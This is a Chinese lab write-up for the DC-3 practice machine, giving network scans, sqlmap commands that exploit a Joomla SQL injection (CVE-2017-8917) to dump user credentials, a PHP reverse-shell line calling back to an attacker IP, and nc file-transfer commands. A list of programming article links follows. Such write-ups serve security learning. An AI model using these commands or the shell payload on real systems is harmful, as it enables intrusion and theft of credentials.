靶机DC-3的通关笔记
时间:2020-04-21
本文章向大家介绍靶机DC-3的通关笔记,主要包括靶机DC-3的通关笔记使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
首先找到靶机ip
netdiscover -r 192.168.1.0/24
nmap -sS -T3 -p- 192.168.1.135
nmap -A -n -Pn -T3 -p80 192.168.1.135
找了一个牛逼的字典https://github.com/TheKingOfDuck/fuzzDicts
sqlmap -u "http://192.168.1.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.1.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --D joomladb --tables -p list[fullordering]
sqlmap -u "http://192.168.1.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
sqlmap -u "http://192.168.1.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C 'password,username' --dump -p list[fullordering]
<?php exec("bash -c 'bash -i >& /dev/tcp/192.168.1.131/1337 0>&1' ");?>
最后总结:
1.joomla存在SQL注入漏洞 CVE-2017-8917 ---> https://www.freebuf.com/vuls/135035.html
2.查资料得有一个针对joomla的工具joomscan --->https://github.com/rezasp/joomscan
3.searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本--->https://www.exploit-db.com/
4.在linux中 、uname -r 查linux内核 版本、lsb_release -a 查操作系统版本、arch查当前主机的硬件结构类型
5.我真菜
补充一些细节:
1.Joomla 默认模版路径在/templates/下,而shell保存在了beez3下,保存时会显示的,
2.sqlmap参数都是参照42033.txt
3.nc传文件:
靶机: nc -lvvp 1337 >exploit.tar
Kali :nc -q 1 192.168.1.135 1337 <exploit.tar
-q 1 传完后一秒自动退出
原文地址:https://www.cnblogs.com/yeblade/p/12743614.html
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- IDEA 非常重要的一些设置项 → 一连串的问题差点让我重新用回 Eclipse !
- ArrayList源码分析(基于jdk1.8)(二):subList陷阱补充
- Windows10中安装Docker
- Windows下Docker安装ClickHouse
- ArrayList源码分析(基于jdk1.8)(三):Arrays.asList方法带来的问题
- 对基本类型包装类常量池的补充
- 与IntegerCache有关的一个比较坑的面试题
- C# Foreach循环本质与枚举器
- Java中的时间和日期(一):有关java时间的哪些坑
- Java中的时间和日期(二):java时间存储的基本原理
- 常用SQL语句
- Java中的时间和日期(三):java8中新的时间API介绍
- Java中的时间和日期(四):与java8时间API有关的一些总结和补充
- Head First设计模式——策略模式
- 可重用性的6个级别